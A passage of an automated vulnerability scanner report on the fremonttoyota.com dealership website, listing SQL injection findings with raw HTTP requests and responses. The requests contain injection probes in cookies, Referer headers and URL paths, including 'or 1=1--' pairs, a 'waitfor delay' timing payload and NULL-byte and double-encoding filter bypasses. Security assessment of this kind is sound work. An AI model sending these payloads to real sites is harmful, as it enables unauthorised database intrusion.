Response

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 03:30:27 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 47986

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso
...[SNIP]...

1.155. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Tacoma%20PreRunner/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:05:40 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:05:40 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:05:41 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 28313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Tacoma P
...[SNIP]...
</div>The 2011 Toyota Tacoma PreRunner is a exceptional pick-up truck with stylish appeal.<br />
...[SNIP]...

Request 2

GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:05:52 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:05:52 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:05:53 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 28262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Tacoma P
...[SNIP]...

1.156. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Tacoma%20PreRunner/

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00'; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:48:18 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:48:19 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:48:19 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 28261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Tacoma P
...[SNIP]...
</div>The 2011 Toyota Tacoma PreRunner is a exceptional pick-up truck with stylish appeal.<br />
...[SNIP]...

Request 2

GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00''; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:48:33 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:48:34 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:48:34 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 28237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Tacoma P
...[SNIP]...

1.157. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x2/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Tundra%20Double%20Cab%204x2/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Toyota/Tundra%20Double%20Cab%204x2/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:30:45 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:30:45 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:30:46 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 31218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Tundra D
...[SNIP]...
IMG SRC='http://images.carprices.com/pricebooks_data/usa/colorized/2011/Toyota/View/Tundra_Double_Cab_4x2/Base/8241_040.jpg' WIDTH=277 STYLE='float:left; padding: 5px;margin: 5px;'>Drivers looking for exceptional strength should turn to this particular Tundra. With its large 5.7-liter engine, this V8 Tundra is ready to demonstrate its fearless performance. This trim additionally offers 18" steel wheels and c
...[SNIP]...

Request 2

GET /Toyota/Tundra%20Double%20Cab%204x2/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:30:52 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:30:52 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:30:53 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 31011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Tundra D
...[SNIP]...

1.158. http://www.fremonttoyota.com/Toyota/Venza/ [BIGipServerAPACHE_DEV cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Venza/

Issue detail

The BIGipServerAPACHE_DEV cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the BIGipServerAPACHE_DEV cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the BIGipServerAPACHE_DEV cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Toyota/Venza/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000%2527;

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:35:48 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:49 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:35:49 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 27957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Venza at
...[SNIP]...
cebooks_data/usa/colorized/2011/Toyota/View/Venza/Base/2822_1F7.jpg' WIDTH=277 STYLE='float:left; padding: 5px;margin: 5px;'>The 4-door Toyota Venza comes equipped with a stellar 6-cylinder engine and exceptional all-wheel drive. You'll love the dual chrome exhaust tips, rear seat personal reading lamps, and the convenient cargo area tonneau cover. <DIV STYLE='float:right; width:850px;'>
...[SNIP]...

Request 2

GET /Toyota/Venza/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000%2527%2527;

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:35:56 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:56 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:35:57 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 27883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Venza at
...[SNIP]...

1.159. http://www.fremonttoyota.com/Toyota/Venza/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Venza/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Toyota/Venza/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:40:08 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:08 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:40:09 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 27853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Venza at
...[SNIP]...
</div>Get more with the 2011 Venza from Toyota, a 6-speed electronically-controlled automatic transmission crossover SUV that packs quite the punch. The Venza's performance is enhanced with exceptional ventilated front brakes and rear solid brakes while the electric power steering option eases your control over the steering wheel. <br />
...[SNIP]...

Request 2

GET /Toyota/Venza/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:40:11 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:11 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:40:12 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 27892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Venza at
...[SNIP]...

1.160. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19672140'%20or%201%3d1--%20 and 19672140'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /carresearch/BodystylesGroup/confid_fremonttoyota19672140'%20or%201%3d1--%20/make_Toyota/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:08:29 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 05:08:30 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 33550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>New Toyota Vehicles - Sterling McCall Hyundai Houston</TITLE>
<META NAME=KEYWORDS CONTENT="New Toyota Vehicles, Toyota, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry Hybrid, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota FJ Cruiser 4x2, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander Hybrid, 2010 Toyota Highlander Hybrid, 2010 Toyota Land Cruiser, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyot
...[SNIP]...

Request 2

GET /carresearch/BodystylesGroup/confid_fremonttoyota19672140'%20or%201%3d2--%20/make_Toyota/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:08:36 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 05:08:37 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 30222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>New Toyota Vehicles - </TITLE>
<META NAME=KEYWORDS CONTENT="New Toyota Vehicles, Toyota, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota 4Runner, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Avalon, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry, 2010 Toyota Camry Hybrid, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota Corolla, 2010 Toyota FJ Cruiser 4x2, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota FJ Cruiser 4x4, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander, 2010 Toyota Highlander Hybrid, 2010 Toyota Highlander Hybrid, 2010 Toyota Land Cruiser, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Matrix, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota Prius, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota RAV4, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sequoia, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Sienna, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacoma 4x2, 2010 Toyota Tacom
...[SNIP]...

1.161. http://www.fremonttoyota.com/inventory.php [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /inventory.php

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmc cookie. The application took 66165 milliseconds to respond to the request, compared with 45707 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /inventory.php?&VehicleType=New HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
